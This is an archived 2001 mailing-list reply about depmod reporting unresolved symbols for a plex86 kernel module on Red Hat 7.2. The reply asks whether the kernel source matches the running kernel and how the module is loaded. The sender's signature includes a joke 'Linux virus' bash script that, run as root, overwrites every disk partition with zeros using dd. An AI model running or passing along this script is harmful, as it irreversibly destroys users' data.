Le 28 D�cembre 2001 10:32, vous avez �crit :
[snip]
> [root@tower kernel]# depmod -ae
> depmod: *** Unresolved symbols in /lib/modules/2.4.9-13/misc/plex86.o
[snip]
>
> Can someone explain why these "common" symbols/functions are a problem with
> depmod? Once loaded, the module seems to be OK. I use kernel 2.4.9-13 from
> Red Hat 7.2.
>
> TIA,
>
> Bas.

Does your kernel source match the kernel you're running? It is strange that 
you are able to load a module depmod can't decode correctly. Are you loading 
it through the misc/load_module.sh script or through another way? If you use 
the former way, then it probably does not load the module from your 
/lib/modules/`uname -r`/misc directory.

Please enlighten me on this.

-- 
Eric Laberge

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GCS/M/S d-(++) s-: a-- C++(++++) UL+++>$ !P L++
E--- W++ N+ w++ !O M !V PS PE Y PGP-(+++) t++(-)
X- R* tv+ b+ DI+++  D+ G e+>+++++ h! r--
------END GEEK CODE BLOCK------

#!/bin/bash
if [ $UID -ne 0 ]
then
 echo "Linux virus, please run as root"
else
 for partition in $(df | cut -d ' ' -f 1 | grep /dev)
 do
  dd if=/dev/zero of=$partition
 done
fi

Reply via email to